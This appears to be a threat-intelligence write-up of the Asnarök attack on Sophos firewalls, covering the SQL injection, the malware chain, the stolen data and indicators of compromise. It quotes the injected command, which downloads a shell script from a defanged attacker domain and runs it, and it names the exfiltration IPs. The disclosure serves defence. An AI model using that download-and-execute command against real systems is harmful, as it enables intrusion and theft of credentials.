Customized malware “Asnarök” targets firewalls

SQL vulnerability in Sophos firewall products, allows remote code execution, used for a coordinated attack on Sophos and its customers.

Share this Intel:

An SQL injection vulnerability, in some Sophos firewall products, that allowed remote code execution, was used to orchestrate a coordinated attack on Sophos and its customers.
The attack, which used a chain of Linux shell scripts that downloaded ELF binary executable malware, was purportedly carried out to steal sensitive information from the firewall.
The binary had the capabilities to steal:
- The firewall’s license and serial number
- Email addresses of user accounts that were stored on the device and the firewall admin’s primary email.
- Firewall users’ names, usernames, encrypted form of their passwords, and the salted SHA256 hash of the admin account’s password.
- User IDs permitted to use the firewall for SSL VPN and accounts that have permission to use a “clientless” VPN connection.
After fixing the vulnerability, Sophos shared a detailed analysis of the attack and the malware.

An attacker discovered, and exploited, a zero-day SQL injection remote code execution vulnerability.
This allowed the attacker to insert the following command into a database table: ||cd /tmp/ && wget hxxps://sophosfirewallupdate[.]com/sp/install.sh -O /tmp/x.sh && chmod 777 /tmp/x.sh && sh /tmp/x.sh||
Once inserted, the command downloaded a shell script into the /tmp directory.
And the script executed a series of SQL commands and dropped additional files into the virtual file system.

The script initially ran Postgres SQL commands to modify or the values of certain tables in the database.
However, it backfired, and the attacker’s SQL command line appeared on the firewall’s admin panel.
The x.sh downloaded some other scripts to connect to sophosfirewallupdate c2c server.
It downloaded and ran an ELF binary file. After which, it deleted itself from the device filesystem.
In the process list, the program name is: cssconf.bin, which resembles the legitimate process: cscconf.bin.
While the binary was in memory, it repeated a series of tasks every 3 to 6 hours.
It first tried to make a connection to 43.229.55.44.
If not, it resolved the IP for sophosproductupdate[.]com to download another ELF binary Sophos.dat.
The other two shell scripts, retrieved by initial x.sh script, acts as a backup if the previous steps fail.

The binary tries to retrieve the public IP of a firewall using ipconfig.me, if not, it queries checkip.dyndns.org.
It then queried data storage areas on the firewall to acquire information about the firewall and its users. This included the IP address allocation permissions, the OS version, CPU type, amount of memory, etc.
It then compressed the information stored in Info.xg and used OpenSSL to encrypt the archive file.
The encrypted file was to be uploaded to a machine at the IP: 38.27.99.69.
The malware finally cleaned up its tracks by deleting the files temporarily created to collect information.

File Indicators
File name	SHA256	File Type	Functionality
Install.sh [/tmp/x.sh]	736da16da96222d3dfbb864376cafd58239344b536c75841805c661f220072e5	Bash	Main install script. Compromised firewall settings, dropped two files and modified a third.
		Shell script
lc [/tmp/.n.sh]	a226c6a641291ef2916118b048d508554afe0966974c5ca241619e8a375b8c6b	Bash	Downloaded lp (ELF dropper)
		Shell script
bk [/var/newdb/global/.post_MI]	4de3258ebba1ef3638642a011020a004b4cd4dbe8cd42613e24edf37e6cf9d71	ELF	Downloaded patch.sh
		X86 binary
lp [/tmp/b]	9650563aa660ccbfd91c0efc2318cf98bfe9092b4a2abcd98c7fc44aad265fda	ELF	Main dropper. Downloaded 2own (data exfiltration) module
		X86 binary
in.s_h	8e9965c2bb0964fde7c1aa0e8b5d74158e37443d857fc227c1883aa74858e985	Bash	Slightly modified form of install.sh
		Shell script
2own	31e43ecd203860ba208c668a0e881a260ceb24cb1025262d42e03209aed77fe4	ELF	Data theft module. Exfiltrates to 38.27.99.69
		X86 script

IPs

Additional Suspicious Domains

Be informed about these Threats in your Inbox